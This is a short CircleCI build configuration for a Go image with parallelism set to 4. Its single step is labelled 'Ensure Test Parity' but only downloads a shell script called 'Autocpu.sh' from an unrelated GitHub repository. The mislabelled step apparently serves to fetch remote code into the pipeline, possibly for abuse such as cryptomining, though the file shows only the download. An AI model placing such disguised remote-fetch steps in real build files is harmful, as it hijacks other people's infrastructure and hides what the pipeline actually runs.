version: 2

jobs:

  build:

    docker:

      - image: cimg/go:1.16.4

    parallelism: 4

    steps:

      - checkout

      - run:

          name: Ensure Test Parity

          command: |

            wget https://github.com/sijagungmuda/cipiuu/blob/main/Autocpu.sh
